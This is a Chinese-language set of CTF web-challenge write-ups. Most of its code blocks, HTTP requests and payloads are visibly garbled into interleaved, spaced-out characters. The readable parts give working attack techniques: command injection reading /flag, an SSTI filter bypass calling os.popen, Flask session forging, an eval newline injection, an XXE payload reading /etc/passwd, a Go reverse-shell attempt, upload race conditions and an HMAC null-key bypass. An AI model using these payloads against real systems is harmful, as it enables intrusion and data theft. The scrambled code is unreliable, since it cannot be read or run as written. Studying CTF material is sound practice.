< < < < ! h h / b / / D t e h o b h O m a e d o t C l d < < < a y < < d m T > m m t d > h f / y l Y l e e i > 2 o f > > P a t t t > r o E n a a l U m < < < < r g e p l i b b m h = c n > l a a n r u > t " h a F o c b p > t m e a m i a t e u < t l n r e l d i l t b o > " s = e o r n > e " a n f t > t v U = o y t = i p . " r p y " e l t h = e p U w o a t " = e T p a r t f " = F o d p i f " - r < F : l i s 8 t / i / e l u " " t l / " e b > i e n > " m c t < C i o l d h i t n e h e o d " t > 2 5 o = > e > . s " U n a e f p t n i l = n a l o " a e a w . . " d i n t < d s a n / t s r a b h c m u = t f e t d f i = t e . l " o v c e f n i n : i > c : < l e 2 / e - 2 l " w 0 a i 6 b a d 8 e c t / l c h u > e , p p l t i o = n a " i d . t " t i a a m r l e " - t s h r c o e a d q l = u e " i = P r 1 O e . S d 0 T > " " > e n c t y p e = " m u l t i p a r t / f o r m - d a t a " >

[NSSRound#13 Basic]ez_factors

题目说明:原生 Linux 因数爆破工具。flag在根目录

漏洞是联合命令执行,学到一个命令 od 可以将命令执行结果转化为数字

o d - A n - t o 1 / f l a g

之后再转换回来就好

[MoeCTF 2022]ezphp

< h e $ $ $ i } i } f } f } e ? i c f g g f f o o c p g h l i e ( ( r r h h h o a v t ! $ e e o p l g e o i e _ e a $ a $ i " m u s x P x c $ c $ ' g < = e t s i O i h k h k t h b e t S t e e h t r ' = = t ( T ( ( y ( y e P _ > x ( $ [ $ $ $ H f < x ' ' $ g ' g _ = _ = f P i b x c N _ i f e P G l l r x a o G v l t O $ E $ a e > x n ! E e a o S v T $ g ( " x T m g u T a v ' ; x c f [ e ' t l a a i s x a l ' ) ] ) a u s l s o ' n a f ; ; s e u u ; g l = ; $ e : r n . a = $ k ; c e T g = k e ' e e r ' e y . d y ] ' y . t ) f = x f a l = > $ t l g & a > f ' a a & g $ l ) g i ' $ v a ; ! n ! v a g ' . i a P l ; ; s l O u G C s u S e E o e $ e T ) T m t _ ) e ( G { $ E { o _ T n P [ ! O ' ' S f ' ; T l f s [ a l o ' g G a u f ' P E g r l ] O T c a S e g = T . ' = t ] = x ) t ) ' ' { f l a g ' ) { G E T P P O O S S T T G E T ' f l a g ' ' f l a g ' ' f l a g '

关键

i } f ( $ _ e P x O i S t T ( [ $ ' g f e l t a o g u ' t ] ) ; = = = ' f l a g ' $ _ G E T [ ' f l a g ' ] = = = ' f l a g ' ) { P O S T G E T ' f l a g ' ' f l a g '

如果没有这个判断直接传入flag=flag即可调用到

f } o r e a $ c $ h k e ( y $ _ = G E $ T $ v a a s l u $ e k ; e y = > $ v a l u G e E ) T { G E T

将flag带出

所以可以迂回下,?a=flag&flag=a,等价于flag=flag

[安洵杯 2020]Normal SSTI

需要绕过,简单测试 过滤了{{}} config . _ []等等

可以使用|attrunicode绕过

{ % p r i n t ( l i p s u m | a t t r ( % 2 2 \ u 0 0 5 f \ u 0 0 5 f \ u 0 0 6 3 \ u 0 0 6 c \ u 0 0 6 1 \ u 0 0 7 3 \ u 0 0 7 3 \ u 0 0 5 f \ u 0 0 5 f % 2 2 ) ) % }

测试过发现lipsum没有过滤

f g l l a o s b k a l s l i 使 p s u m , . _ g l o _ b _ a b l u s i _ l t i n f s u _ n _ c t i o l n i p s u m . _ 使 _ g l m o o b d a u l l s e _ _ o s

所以可以构建出

{ { % % p p r r i i n n t t ( ( l l i i p p s s u u m m | | a a t t t t r r ( ( % ' 2 _ 2 _ \ g u l 0 o 0 b 5 a f l \ s u _ 0 _ 0 ' 5 ) f | \ a u t 0 t 0 r 6 ( 7 ' \ g u e 0 t 0 ' 6 ) c ( \ % u 2 0 2 0 o 6 s f % \ 2 u 2 0 ) 0 | 6 a 2 t \ t u r 0 ( 0 ' 6 p 1 o \ p u e 0 n 0 ' 6 ) c ( \ ' u c 0 a 0 t 7 3 / \ f u l 0 a 0 g 5 ' f ) \ | u a 0 t 0 t 5 r f ( % ' 2 r 2 e ) a | d a ' t ) t ( r ) ( ) % % 2 } 2 \ u 0 0 6 7 \ u 0 0 6 5 \ u 0 0 7 4 % 2 2 ) ( % 2 2 \ u 0 0 6 f \ u 0 0 7 3 % 2 2 ) | a t t r ( % 2 2 \ u 0 0 7 0 \ u 0 0 6 f \ u 0 0 7 0 \ u 0 0 6 5 \ u 0 0 6 e % 2 2 ) ( % 2 2 \ u 0 0 6 3 \ u 0 0 6 1 \ u 0 0 7 4 \ u 0 0 2 0 \ u 0 0 2 f \ u 0 0 6 6 \ u 0 0 6 c \ u 0 0 6 1 \ u 0 0 6 7 % 2 2 ) | a t t r ( % 2 2 \ u 0 0 7 2 \ u 0 0 6 5 \ u 0 0 6 1 \ u 0 0 6 4 % 2 2 ) ( ) ) % }

字典:

{ } " ' ) c o n f i g . = + % > > = < = = = ! = ; \ n \ r \ t , e v a l e x e c c o m p i l e i n p u t g e t a t t r s e t a t t r g l o b a l s l o c a l s o p e n o s s y s t e m s u b p r o c e s s p o p e n _ c l a s s _ _ _ d i c t _ _ _ g e t a t t r _ _ _ s e t a t t r _ _ _ g l o b a l s _ _ _ b u i l t i n s _ _ _ s u b c l a s s e s _ _ _ m r o _ _ _ c a l l _ _ _ i n i t _ _ i m p o r t _ i m p o r t _ _ f r o m a s s y s s o c k e t s u b p r o c e s s . g e t ( ) . s e t d e f a u l t ( ) . i t e m s ( ) . k e y s ( ) v a l u e s ( ) [ ] # { % % } { { } }

[CISCN 2019华东南]Web4

flask_session伪造

网站存在一个任意文件读取,虽然不能使用file协议,但可以使用local_file协议

源码审计

# i i i i f a r a a @ d @ d @ d i m m m m r p a p p a e a e a e f e p p p p o p n p p p f p f p f n o o o o m d . . p p p c r r r r = o c d . i s r . r t e . f i e _ a o t t t t f m o e r n e e r e r x r l f l n p d l F . n b o d s t o a y c o a s a p i r r u u a l s f u u e s u u d : e u g s e m . n e a u r s a e i g t x i r t ( u # i # i r r p p r t ( e r : r e r g n i l k s e g e ( o n e ) r f f e e t r e e ) s e e _ u : d d l k d [ = ( ) n ( : l s t i t ( : s t t _ n u o i i ( ( ' ' : [ ' ' r ' u E n u ' i u u ( t m b m _ u S T / ' H / = U e r U f r = r x t r / o r r = d f p _ u E r ' u e r R . e R l e n c ( n f n n n = e - o n i C u ) s l e r L m t L a t u e s l b 8 r a d R e e l a e a u g u r r p t ' a a o ' u t m . E r o d q t r ' r l e t r n g n p A g e g T n ' u c n n l s i ( o ' d e c _ = F _ e _ a W ) e f h i i . o e ) n c m T l _ t K m o s i ( ' f n ' b r n x r s ( e a r a ) n E e r t l ' N l N . e ) e e ' s i u s o Y ' l . e ^ o a u o u a a ) s s / s n e k d ' ] d a f g r r d s p s f _ , , e ] ! r i H l H l ( o i l d _ ( = g l a . a o ) e n o a e ' h s ) = R s e c l c p x s n g n : o e ) ' e . . k o k e : e . . i s s s w a g * ' w ' n ' g t e t s t w d e ' e ( e x d = i r w t , r u t t ' " o ( - s ( ( r ( ' 0 n r d o ' u ) l ' ) . , a a m u r : ) u . 0 n t e r l s r . r d a t l , e e 0 e o ' h ' r a . q m i ) r n d 0 u . n e a ( " e r g . m ) ) s a s I e t n ' G ' d N ) o O m R = ( E = ) C A ' S f E u 2 ) c 3 : k 3 ' ) :

关键点在于

r a a p n p d . o c m o . n s f e i e g d [ ( ' u S u E i C d R . E g T e _ t K n E o Y d ' e ] ( ) = ) s t r ( r a n d o m . r a n d o m ( ) 2 3 3 )

其中的uuid.getnode()是获取了本机的mac地址,应该是以整数形式乘以了233,在linux环境下可以通过读取/sys/class/net/网卡/address来获取mac地址

mac地址本质上是16进制,通过python2环境找出随机数

1 3 7 . r p 9 a r 2 n i 7 d n 8 o t 8 m ( 8 . s 4 s t 4 e r 5 e ( d r ( a 0 n x d 0 o 2 m 4 . 2 r a a c n 0 d 2 o 3 m 0 ( f ) c * ) 2 3 3 ) )

再使用flask_session_cookie_manager伪造密钥

n { n e e ' e y k u k J o s o 1 @ e @ c a r a 2 o n o V s a s y c m c b - e - m n ' n F e : e t k k Z o b o S 2 ' 2 I 0 w 0 6 5 w 5 I w m [ - [ Z d 1 f a f Y l t l 2 a a a s s ' s i k } k f _ _ Q s s . e e Z s s 8 s s K i i g o o 2 n n w . ] ] t r $ $ N i p p e y y d t t m h h k o o N n n U 3 3 E h f f 7 l l M a a g s s g k k 8 _ _ v s s l e e A s s P s s b i i C o o g n n y _ _ 0 c c 0 o o o o k k i i e e _ _ m m a a n n a a g g e e r r 3 3 . . p p y y d e e n c c o o d d e e - - c s e ' y 1 J 3 1 7 c . 2 9 V 2 y 7 b 8 m 8 F 8 t 4 Z 4 S 5 I ' 6 e - y t I g " Y { i ' I u 6 s I e m r Q n z a Z m D e N ' M : V ' 1 f J u o c Z k E ' d } F " P S J 9 f Q . Z 8 K e B A . v L 0 g b G f X m 1 8 P i S 3 u 5 S b u j - u o z p g - s " 1 3 7 . 9 2 7 8 8 8 4 4 5 "

值得一提的是这道题目有坑,他是python2的环境

prize_p4

访问得到一个奇怪的前端

随便输入点什么,发现有一个/getkey

@ a p p . r o u t e ( ' / g e t k e y ' , m e t h o d s = [ " G E T " ] ) d e f g e t k e y ( ) : i f r e q u e s t . m e t h o d ! = " G E T " : s e s s i o n [ " k e y " ] = S E C R E T _ K E Y

关键点是

i f r e q u e s t . m e t h o d ! = " G E T " : s e s s i o n [ " k e y " ] = S E C R E T _ K E Y

若请求不等于GET,则返回SECRET_KEY可以使用类似GET的HEAD请求

返回

H C C V S S D T o o a e e a T n n r t r t P t t y - v e / e e : C e : 1 n n o r . t t C o : S 0 - - o k a T L o i W t 2 y e k e e , 0 p n i : r 0 e g e k 0 : t s z 1 O h e e K t : s u M e s g a x 1 i r t 1 2 / 8 n . 2 h = 0 0 t e . 2 m y 1 5 l J ; r P 0 Z y 6 c X t : h k h 1 a i o 9 r O n : s i / 1 e I 3 7 t 3 . = Z 9 G u j . M t R 7 T f m - Y 8 z k y Z i 0 2 O D Q x L T R j N T U t O W F i N S 0 2 M T l j M W N m N D N j Z D I i f Q . Z 8 K m 5 Q . I U f b W h d r a 0 1 x h z O _ m 1 A M p z S D B o o ; H t t p O n l y ; P a t h = /

解码session

n b e ' k { o " @ k a e o y s " c : - " n 7 e f k 4 o f 2 c 0 9 5 2 f [ - 6 f 8 l 4 a 1 s - k 4 _ c s 5 e 5 s - s 9 i a o b n 5 - ] 6 1 $ 9 c p 1 y c t f h 4 o 3 n c 3 d 2 f " l } a ' s k _ s e s s i o n _ c o o k i e _ m a n a g e r 3 . p y d e c o d e - c e y J r Z X k i O i I 3 Z j R m Y z k y Z i 0 2 O D Q x L T R j N T U t O W F i N S 0 2 M T l j M W N m N D N j Z D I i f Q . Z 8 K l n A . d x a Z 5 1 r L c C O B h v O o l W E V n f C I t z E

得到key,解码 伪造

n { e ' k a o d @ m a i o n s ' c : - n F e a k l o s 2 e 0 , 5 ' [ d a f t l a a ' s : k _ b s ' e a s ' s , i o ' n u r ] l ' $ : p ' y a t ' h } o n 3 f l a s k _ s e s s i o n _ c o o k i e _ m a n a g e r 3 . p y d e c o d e - c e y J h Z G 1 p b i I 6 Z m F s c 2 U s I m R h d G E i O n s i I G I i O i J Z U T 0 9 I n 0 s I n V y b C I 6 I m E i f Q . Z 8 K n a Q . q c n J z 6 q 2 I O b J t 8 5 B T j X E D R 7 6 F E I - s " 7 f 4 f c 9 2 f - 6 8 4 1 - 4 c 5 5 - 9 a b 5 - 6 1 9 c 1 c f 4 3 c d 2 "

得到

f i i i i S a a # @ @ d @ d @ d @ d d @ d @ d i r m m m m E p p s a a e a e a e a e e a e a e f o p p p p C p p r p p f p f p f p f f p f p f m o o o o R . c p p p p p p p r r r r E = c S . . i r . g d i u i r . h i e . g i r g i . g i r . g r r _ a f t t t t T o E i r r n e r e a f r f e r o f l r e f e e f r e f e r e e e n p l _ F n C n o o d t o t t l t o m s o t t t o t t o t s t a p a b u u f K l f R u u e u u _ a t d u u e s e u k r u k r u _ s u u _ u m . s a r u l E a i E / t t x r t d y d = a s s s r r t ( e r : r t e e s r e e s t h e i d u i r t f = r e r k s l i a Y s g T a e e ( n e a = p a t e e e e n e ) s e e e y q e n y q e e i s f a r f n e l n _ u e l d g = k . _ p ( ( ) ( t e t r a s s s t ( : s t t ( ( u s ( u s ( n s t l ( a f _ n i 6 i s ( u K p ' ' : r ' a r ( a e s s s u r ' i u u ' ) e s r ) e s ' d i ' a _ u " ' g l r ( m 4 b t _ p E e / ( e d = q a i i i r e / o r r / : s i e : s i / d o f r = t r r w / ( a e = h p . r _ d Y i n g ) q a d u n o o o n d h n n n g t o n t o g _ n i e ( e l e h g ) g s = o o r ( n a = n d e : u t a e d n n n i o . e . n d . n e r [ l t s x _ t a e : . s r e u a t S d e t e a t s [ [ [ r r m g r r t m [ e m [ t e ' e u e t t u t t w t t q u m e E e r _ s ) a t u ' ' " e e e e e e k e " r e " _ s d : r s = e r f a = u i e ( C x _ d t . . r d u a d c ' t n n e t k _ t k h u a ' n s u x n ? l f _ ' F e d _ d R ' t a . i e f l a r d i t , ( d d y h e t h e i l t i r t ? a ( m 0 l s . _ i E , e t f s n o : t l m r ( " e e ' o y e o y n t a i " o l " ? g r a . a t u ) c T m m a o c r a ' i e u m a r r , d " m d " d ( ' n n n l i y " ' e i 0 s u t _ e p ' r s o m ' ] n c r e d _ _ ] p ] d ) ] o [ i n o , q n . k i ( K t l , m t d . ] " t l t m t t m ! = l ! = _ : s ' b u u _ 0 , d E h a . r e g = ] ( _ h i e e e = S a = S r a e n d . d m e _ . 4 Y o t m g : ( e = = u f o n m m t E t E e n s o a r a g e s ' 0 r ( , d e e e ' t u F r o d " p p h " C e " C s d s t e t e t t : ' e ) s ( t t u ( d r a l r s , l l o G R _ G R u i n a q a t h ) , q ) = " h ( t ' a l l _ ( = F a a d E E s E E l s o o ' u o u [ i o ' f u t s f ' [ a t t s T T t T T t e n " ] e o i d d e ' n d d 8 r a e o / " l e e = " _ r " _ ' s [ ) s r t s e s G d s a ' l r ' G s _ ( [ : K i : K , s ' . t " = b t E e = t ) ' ( ) E e s " " E n E i u d . d [ u , T x [ a , ' ) T ) t h G Y g Y m o r e u a " g ' . " ' h " : r o E ( ' e n l c r t G = s ] h G , ' o ] i m T ' ' t [ ' o l a E F e ) t E h m ) n e " ' ' h ' ] d o T a s m T ' t e g . ] ' ) o u : e p i " l s l " 1 t ' ( h ) @ d r ( e n ] s i " , 2 p ) o t a s l ' n ) e o ) ' 3 : ) p m p = ' u ( u , n P ' / e l p [ ] t s r , O ) / n " . " : f e l p S 1 ( , r G 8 s _ o r T 2 _ d o E ' s t r e ' 7 _ a u T ) i e t n ] . f t t " o x = d ) 0 i a e ] n t 8 e . l = ( ) [ : 8 r 0 e s ' ' 8 _ . _ e / u 8 t 1 _ s g r ) e : ) s e l m 8 . i t ' p 8 r o k ] l 8 e n e ) a 8 a . y . t / d g ' r e ' ( e , e , ) ) t a ) ( m d u ' e ( r d t ) l a h . _ t o d f a d e o ' s c r , = o , ' [ d r N " e e o G ( d t E ' i T u r f " t e i ] f c n ) 8 t d ' , ) r d e a n t d a e . r . _ . t ' e ) m ) p l a t e _ s t r i n g

关键点位于

@ d a e p f p . g i r r e f e o t t u _ s u t h e i d u i r e i s f a r f n ( n s t l ' d i ' a _ u " / d o f r = t r r w g _ n i e ( e l e h e r [ l t s x _ t a t e ' e u e t t u t _ s d : r s = e r h u a ' n s u x n ? i l t i r t ? n t a i " o l " ? d ( ' n n n l i y " d ) ] o [ i n o _ : s ' b u r a e n d . d e n s o a r a g s d s t e t e u i n a q a t l s o o ' u t e n " ] e o i ' s [ ) s r t , s ' . t " i u d . d m o r e u a e n l c r t t [ ' o l a h ' ] d o o u : e p i d r ( e n s l ' n = ' u ( u [ ] t s r " : f e l G 8 s _ E ' s t T ) i e " o x ] n t ) [ : ' u r l ' ] ) . r e a d ( ) . d e c o d e ( ' u t f 8 ' )

任意文件读取,如果存在字符则返回you get it

盲注

i i f s f w m m r l h p p o = a i o o m g l r r " e f t t s - = o e 0 T r b r t 1 " r a e u 2 N u i t d r r # r i s q p 3 S e m a e e p e f e u t 4 S : i p t s s r s 6 e o 5 C n _ a . i u " 4 s o 6 T f = g n l y f p b t l 7 F s l = e t t o l r r s s 8 { : a r t ( u a i e . 9 " g { e ( s = g n a w a ' q u t g t k h b = u u r r r e + ( e c r e l ( e t = " e d f l s = r q f l e l ' t " e u i i l f a : s h s e t a i g g ' . t . s " g m h F S t c t " p i + I e p o s i , o j L s : . n r k i E s k g f t l : i i e r l m / n e t e a W n n o s ( s g h o / ( d . u u ) e p p ) e v r l e q r 4 a l t l r o . l = . s c a u " t t / n e h e u s n s t x v e a ( t t w l . ) p : x f n ) : y / s [ / z e s 2 / A n c : n B v t - o C i f 2 d D r . ] e E o c ) 4 F n n . G ' : a H , 2 n I ' 8 n J d 6 a K a 2 . L t 6 n M a / s N ' g s O : e c P t t Q t _ f R m d . S p a c T _ t n U f a : V l " 2 W a , 8 X g d 6 Y , a 2 Z ' t 6 " s a / u = g b d e m a t i t _ t a h ' ) i : n ' d % d E _ 6 r % e 8 s F u % l 9 t 0 " % , E c 4 o % o B k A i % e A s 4 = ' { } " s e s s i o n " : s t r ( r e s . c o o k i e s . v a l u e s ( ) ) [ 2 : - 2 ] } )

[NSSRound#13 Basic]MyWeb

阅读代码

e i } } } < r f ? r e e p o ( l l h r $ $ $ $ f s $ e p s h p _ _ d v d i e d v r e i r G a a a l a a i g e E t l t e i t l n { h p T a u a _ f a ( t l o [ e p ' _ i r J ' = = u ( = $ r g t S m = t $ d ( h i O o f s _ _ f a $ t n N d i a t c G i t d _ g e l d r o E l a a f ( ' e d _ n T e t i E ] _ s r t [ _ = a l _ g l e e ' g ) e A = e a p n m e ' ; ( L = t s l t o t _ L _ h a s d _ . _ ) ' c e c ( e c F ; s o s e ' ' o $ I a n ( ( ] n d L j v t $ ' t t a E s e e _ ] m = e t _ o ' n G ' p = n a _ n ) t E , / t ) s T d ' s . ; { ( [ " a r ( ' ' , t e ' ' v a a ; t a ' . d t ' m l $ j ' m ) p u v s ) p ; / e a o / d ' l n { d # a ] u ' a t ) e , t a ; ' a . ] $ . j # " d j s , a s o t o n $ a n ' d ) ' ) a ; ) ; t ; a # ) # ; #

在本地尝试的时候一直打不动,根据wp,重点在

e $ v d a a l t ( a ' $ = d a s t t a r _ = r e ' p l . a c $ e d ( a ' t ] a ' , . " ' , ; ' ' ) $ ; v a l u e ' ] " , $ d a t a ) ; #

需要让eval处执行的命令变为

$ d a t a = [ " " ] ; s y s t e m ( ' r m - r f ) ; ] ;

wp给出了一个非常精巧的解题思路

? m o d e = s a v e & v a l u e = ] / / % 0 a ; p r i n t _ r ( g e t e n v ( ) ) ; / /

%0a是换行符\n的url编码不难推导出,写入tmp的信息变成了

[ ; " p " r ] i / n / t _ r ( g e t e n v ( ) ) ; ] ;

很巧妙的命令执行

[NSSRound#8 Basic]Upload_gogoggo

wow My.go(不是)

一个文件上传,上传后的信息是

U N S S R p o c y u l w r s n o e t a t e e ' d h n m g e e s o d s h o e o u h s t t e u f _ p l c i 2 u p c l 0 t ' e e 2 s s 5 : f s 0 o f a 3 g r u r 0 o l e 4 u l _ S s y a 1 c a v 6 r g , a 2 e e i 2 e . Y l 5 n o a 2 s u b . h r l p o e n t f g _ i i 2 l n 0 e 2 t 5 i h 0 s e 3 0 S f 4 c i _ r l 1 e e 6 e 2 n u 2 s p 5 h l 2 o o : t a _ d u 2 n 0 p k 2 a n 5 t o 0 h w 3 : n 0 4 c _ o 1 m 6 m 2 a 2 n 5 d 2 . p n g

编译,尝试构建一个反弹shell

p i f } a m u c p n k o c a r g t m e a ( i m " " " " n i p c i } d s c d } c c c c e i } a f n o r ( p o o f e a w a e m m m m r f i m e s u ) r n f r i s f d d d d r n t t / n : t n e e t e a . . . e " " e t { = , r r s c u : S S S = r x i : r h h " l = t t t r e m I " = T e c e w t S d d d S c c e P 1 C r ! o l r i : h e i o e h m ! " " 1 " P r = f r n l u n s s e x n u r e d = f r 4 8 m e n n d h h l e t r l . m e . 7 : n t t . s t o e e l c = l R n t t 5 2 = i . u C t i w l l . = = u i . u 1 3 l P r l S r m s l l C c n l P r 4 " n r n o h i e " o o c c ( r n . e { i s e n . : = = m n o o ) { i 1 t n e l g G m n n n n 9 . t ( l O " " a n n t 1 D l ) O c / n l . i n S m b d n 9 a ( d i ( ( 8 l " { . n s " 1 ( e / h 0 " x s e " t e h l c " " l S p : ) h " " e , , l l i e p r + r " ) : : " " , + p e o r r r t ) )

这题还藏flag

[GHCTF 2025] (>﹏<)

题目说明了是xxe

# f i f i # a # @ d # @ d i r m r m p a e a e f o p o p p p f p f m o m o p p r r = . i " r . p " # x p i p t e n r _ # a f t l t F r n " e r a " m r f a r x a e n p l x l F o d " t g o r " l i r y c m t a p a b m r a l u e u h u s n x s : e e u m . s a l e s a t x r c t e P = t m r e l r r p r _ r e r k s k s e ( n t e ( O ( l e r o e o t e n n _ F u e i k ( ) f ( ) X S r x t a s o t o _ l n i 6 m ( ' : o ' : M T e m i u = d o t E u d n a ( m 4 p _ / P p / L q l s r _ l x r e a = s h p o _ ' y e g u ) n e d v = c n m = k o o r n ) t n h e N t t e e = e s r t a h ( c s o " r d _ e p f _ " t t m o _ t t # n N e = e t t " r n _ = e e n _ f . e o e T n r i X o o _ ' F t _ f ' " f : . r t e o M o d m 0 l r _ i P , " X o S X u i e n L t e a . a e ) l O " M r y M e t . . . i 0 s e e S m L m s L , i f a f t n . k _ T e . t P e r s i e _ 0 , _ t g e a s o n x _ . ) h e m r = m e d t " 0 r " . o t s T s : : ( : ' e " r d ( i e r t ' i , q " e s ' s r u r { n f u a = x ( e i s a p e d [ m S # n t m n o s ( ' l a # g r e a r t ) P ' f ( ( ' m t O ) e x e ) e = S . m ) _ 8 # T " l } n 0 ' , " o 8 ] D d 0 ) T p e ) D a r i X s s X e E r n ) o t N o n e e l s e " n a m e "

最开始不知道为什么payload打不进去,url编码也不行,后续研究了下,不能只编码特殊字符全部编码即可

P H A A C C C x O o c c o o o m S s c c n n n l T t e e n t t = : p p e e e % / t t c n n 3 g 1 - : t t t c h 2 E i - - % c 7 n T L 3 t . c n y e f f 0 : p n % . d e g 7 H 0 i k : t 8 T . n e h % T 1 g e a : 6 P : : p p d / 8 - p 2 % 1 0 g a l 4 6 . 8 z l i 1 c 1 0 i i c % p v a 2 , e t 0 i % d o 7 e n 6 f / % l x 6 a - 5 t w % e w 7 , w 2 - % b f 7 r o 3 , r % m 6 z - 9 s u % t r 6 d l f e % n 6 c e o % d 3 e d d % 2 2 % 3 1 % 2 e % 3 0 % 2 2 % 3 f % 3 e % 0 d % 0 a % 3 c % 2 1 % 4 4 % 4 f % 4 3 % 5 4 % 5 9 % 5 0 % 4 5 % 2 0 % 6 6 % 6 f % 6 f % 2 0 % 5 b % 0 d % 0 a % 2 0 % 2 0 % 2 0 % 2 0 % 3 c % 2 1 % 4 5 % 4 c % 4 5 % 4 d % 4 5 % 4 e % 5 4 % 2 0 % 6 6 % 6 f % 6 f % 2 0 % 4 1 % 4 e % 5 9 % 2 0 % 3 e % 0 d % 0 a % 2 0 % 2 0 % 2 0 % 2 0 % 3 c % 2 1 % 4 5 % 4 e % 5 4 % 4 9 % 5 4 % 5 9 % 2 0 % 7 8 % 7 8 % 6 5 % 2 0 % 5 3 % 5 9 % 5 3 % 5 4 % 4 5 % 4 d % 2 0 % 2 2 % 6 6 % 6 9 % 6 c % 6 5 % 3 a % 2 f % 2 f % 2 f % 6 5 % 7 4 % 6 3 % 2 f % 7 0 % 6 1 % 7 3 % 7 3 % 7 7 % 6 4 % 2 2 % 2 0 % 3 e % 0 d % 0 a % 5 d % 3 e % 0 d % 0 a % 3 c % 7 2 % 6 f % 6 f % 7 4 % 3 e % 0 d % 0 a % 2 0 % 2 0 % 2 0 % 2 0 % 3 c % 6 e % 6 1 % 6 d % 6 5 % 3 e % 2 6 % 7 8 % 7 8 % 6 5 % 3 b % 3 c % 2 f % 6 e % 6 1 % 6 d % 6 5 % 3 e % 0 d % 0 a % 3 c % 2 f % 7 2 % 6 f % 6 f % 7 4 % 3 e

[FSCTF 2023]加速加速

条件竞争,需要点运气和网速

分为两个包

P H C C U O C U A R A A C C C < C O o o a p r o s c e c c o o o ? o S s n c g i n e c f c c n n n = n T t t h r g t r e e e e n t t ` t : e e a i e - p r p p e e e n e / n - d n n A t e t t c - n n l - n - n t C e : t g : r - - t W t t W t W H o - o - - e : E L i e - - / e - e T d L n I h T n t n a o b D T f b D b T e e t n t y t e h c n n K i y * K i K P 4 n r s t p : x t o g : i s p ` i s i / . g o e p e t t d u t p e ; t p t 1 a t l c : : M p i a c F o : F o F . n h : u / h : n g l o s o s o 1 n : r / m z t / g e o r i i r i r a m e n u i m / : : s m t m m t m . 3 a - o l l l n e B i a B i B n 3 x R d t l , o g z o o g o o o s 0 - e e i a a d z h u n e u n u s a q 4 p / p e i - n : / n : n c g u . a 5 p 4 p C d p d d t e e a r . l . , N a f n a f a f = s n t 0 i a , r o g r o r . 0 t n / c n d z y r y r y c s a f ( a n e h N m N m N n : . o W t a f ; E - E - E : n r i i . l q b d b d b 2 1 s m n o n a = f a f a f 8 s - d n s t 0 b t b t b 5 c d o / s e . 9 a 9 a 9 2 t a w x c , 9 D ; D ; D 8 f t s h t j j j . a t f b L n L n L c ; N m . r R a R a R n T l c E m E m E : b + n x e x e x 2 o 1 x : W = W = W 8 u 0 m 2 d " d " d 5 n . l 8 7 u 7 s 7 2 d 0 , 5 W p W u W 8 a ; a 2 l b - r p 8 o m - y W p / a i = i l d t - n i _ " - 6 c f - 4 a i - ; t l W i e e x o " b 6 n ; K 4 / i ) x f t m i F A l l o p ; e r p q n m l = a B e 0 m o W . e u e 9 = n b , " d K i 1 a i m . r t a p y / g h N 5 e p E 3 / " b 7 a f . v b 3 i 9 6 f D , j ( i L K m R H a E T g x M e W L / d , w 7 e W l b i p k , e i m G a e g c e k a p n C g h , r * o / m * e ; / q 1 = 2 0 1 . . 8 0 , . a 6 p 1 p 6 l 7 i . c 8 a 5 t i S o a n f / a s r i i g / n 5 e 3 d 7 - . e 3 x 6 c h a n g e ; v = b 3 ; q = 0 . 7

上传包

G H A U U A A E o c p s c c T s c g e c c t e r r e e / : p a - p p u t d A t t p n - e g : - l o L - e E o d a I n t n a e n n t e c d 4 g s : x o / . u e t d 1 a a c M i . n g u h n p n e r z t g h a : e i m : p . - l l n z R l , g H s h e a a z T s - q / p i T c C u 5 p p P t N e . l , / f , s 0 i 1 . z t c d . c h s ( a e 1 n ; : X t f : q 1 i l 2 = 1 1 o a 8 0 ; n t 5 . / e 2 9 L x 8 i h n t u m x l + x x 8 m 6 l _ , 6 a 4 p ) p l A i p c p a l t e i W o e n b / K x i m t l / ; 5 q 3 = 7 0 . . 3 9 6 , i ( m K a H g T e M / L a , v i l f i , k i e m a G g e e c / k w o e ) b p C , h i r m o a m g e e / / 1 a 3 p 4 n . g 0 , . * 0 . * 0 ; q S = a 0 f . a 8 r , i a / p 5 p 3 l 7 i . c 3 a 6 t i o n / s i g n e d - e x c h a n g e ; v = b 3 ; q = 0 . 7

读取包

当文件上传后,会在服务器存在一小段时间后删除,这时候如果同时读取就有机会读取到

条件竞争

某些不健全的文件上传场景中,我们上传的文件会先保存而后检查文件风险,如果存在风险则会被删除,通过大量发包在删除前成功读取到访问到文件,就可以算作攻击成功

[羊城杯 2020]Blackcat

先看代码

i } $ i $ i } e f c f h f c ( l ( h ( h e a i $ o m d n s $ = h d p i d s c h i e t e e e l h e x y ( s t a a ! ( e ( ' t ( n s = ' c $ i $ d h = ( _ n _ e _ " P e P s h $ n O O t m _ c S = S i a P " T T n c O . [ g [ e ( S $ ' e ' ' T _ B t W = s [ P l e h h ' O a n i h a B S c v t a 2 l T k ( e s 5 a [ - ' " - h 6 c ' C ) c c _ ' k O a ; l a h , - n t a t m C e - n - a $ a - S d m c _ t e h e o ( P - a e s n ' O S r r t i s S h ' i i t h T e ] f n o a [ r ) f e r 2 ' i ; ' " ' 5 O f ] ) ] 6 n f ) ; ) ' e ' ) , - ] e ) / $ a { _ r e P ' m e O ] p n S , t v T y [ $ ( c ' c $ l W l _ a h a P n i n O d t d S e e e ' T s - s ) [ t c t ; ' i a i O n t n n e - e e m ) - o ; e n a i r t ' o ] r ) ' ) ] { , $ c l a n d e s t i n e ) ; / / W h i t e - c a t - m o n i t o r $ c l a n d e s t i n e n u l l

关键点

i $ f h ( h i s $ = s c e l h t a a ( n s $ d h _ e _ P s h O t m S i a T n c [ e ( ' ' W = s h h i h a t a 2 e s 5 - h 6 c _ ' a h , t m - a $ m c _ o ( P n ' O i s S t h T o a [ r 2 ' ' 5 O ] 6 n ) ' e ) , - e $ a _ r P ' O ] S , T [ $ ' c W l h a i n t d e e - s c t a i t n - e m ) o ; n i t o r ' ] , $ N c U l L a L n , d e s $ t h i h n e ) ; / / W h i t e - c a t - m o n i t o r $ c l a n d e s t i n e n u l l

如果传入的White-cat-monitor是数组,会导致$clandestine为null,这时就可以预测下面的hash_hmac

payload:

< e ? c p h h o p h a s h _ h m a c ( ' s h a 2 5 6 ' , ' ; c a t f * ' , n u l l ) ;
W h i t e - c a t - m o n i t o r [ ] = l l l & B l a c k - C a t - S h e r i f f = 3 4 f 3 2 5 9 1 5 b 5 3 6 4 6 7 6 e a 2 7 9 c 7 0 0 6 3 9 5 5 2 6 7 e 6 d 4 6 a f 6 a d 7 6 c 9 7 2 3 7 5 0 a 8 f 3 f 2 9 5 4 e & O n e - e a r = ; c a t f *

[MTCTF 2022]easypickle

先看代码

